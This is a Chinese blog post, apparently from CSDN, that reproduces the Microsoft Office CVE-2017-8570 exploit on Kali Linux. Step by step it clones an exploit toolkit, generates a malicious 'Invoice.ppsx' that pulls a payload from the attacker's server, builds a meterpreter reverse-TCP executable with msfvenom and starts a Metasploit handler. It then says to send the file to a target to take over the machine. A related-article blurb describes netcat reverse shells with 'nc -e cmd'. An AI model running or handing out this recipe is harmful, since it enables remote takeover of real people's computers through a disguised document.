kali下CVE-2017-8570利用复现实验

简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396588 ...
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396588

参考:
https://www.youtube.com/watch?v=jUhmPH_u6gs
https://github.com/tezukanice/Office8570
https://www.symantec.com/security_response/vulnerability.jsp?bid=99445
https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570

简介:Microsoft Office容易出现远程代码执行漏洞。 攻击者可以利用此问题在当前登录的用户的上下文中执行任意代码。 漏洞尝试可能会导致拒绝服务条件。

影响范围:
  Microsoft Office 2007 Service Pack 3
  Microsoft Office 2010 Service Pack 2 (32-bit editions)
  Microsoft Office 2010 Service Pack 2 (64-bit editions)
  Microsoft Office 2013 RT Service Pack 1
  Microsoft Office 2013 Service Pack 1 (32-bit editions)
  Microsoft Office 2013 Service Pack 1 (64-bit editions)
  Microsoft Office 2016 (32-bit edition)
  Microsoft Office 2016 (64-bit edition)

cd /tmp
git clone https://github.com/tezukanice/Office8570
cd Office8570
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://监听者的IP/logo.doc
这里会提示找不到文件,只需要创建template目录,然后把提示到的文件mv进去就ok,用到的文件会在报错最后一行提示
再次执行一遍就成功了
生成了Invoice.ppsx文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听者IP LPORT=监听者端口 -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://监听者IP/shell.exe -l /tmp/shell.exe

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 监听者IP
set LPORT 监听者端口
exploit

将Invoice.ppsx传给目标,在目标打开这个ppt文件,拿下目标。

在https://github.com/tezukanice/Office8570中,定义了三种不同情景的操作指导。


另:apt-get install bleachbit -y 
这个软件可以清理Linux电脑的一些缓存
相关文章
|
存储 程序员 C语言
C语言变量命名规则
C语言变量命名规则
919 0
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
504 0
|
编解码 Linux Android开发
安卓投屏神器 Scrcpy 安装与使用(支持 Mac、Windows、Linux)
安卓投屏神器 Scrcpy 安装与使用(支持 Mac、Windows、Linux)
41863 1
|
运维 安全 网络安全
"革新远程访问体验:Docker化部署webssh2,一键启动Web SSH客户端,让远程管理如虎添翼!"
【8月更文挑战第2天】Docker作为软件开发与运维的关键工具,以其轻量级、可移植及强隔离特性简化了应用部署。结合webssh2这一开源Web SSH客户端,可通过浏览器安全便捷地访问SSH服务器,无需额外软件。首先确保已安装Docker,接着拉取webssh2镜像并运行容器,映射端口以便外部访问。配置好SSH服务器后,通过浏览器访问指定URL即可开始SSH会话。此方案不仅提升了用户体验,还加强了访问控制与系统安全。
1075 7
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
2762 5
ms17-010(永恒之蓝)漏洞复现
|
Web App开发 安全 JavaScript
心得经验总结:漏洞复现CVE
心得经验总结:漏洞复现CVE
166 0
|
安全 网络协议 网络安全
HTTPS 存在哪些安全问题,有什么应对方案
HTTPS 是 HTTP 的安全版本,通过使用 SSL/TLS 协议对通信内容进行加密,提供了以下几个关键的安全特性:数据加密、身份认证和完整性保护。尽管 HTTPS 在很大程度上提高了安全性和数据传输的安全性,但仍然存在一些潜在的安全问题。以下是一些可能的问题以及相应的应对方案
导出项目目录树结构
在cmd中切换到自己所需要导出项目树结构的根目录下,在win中可以使用cd来切换文件夹
315 0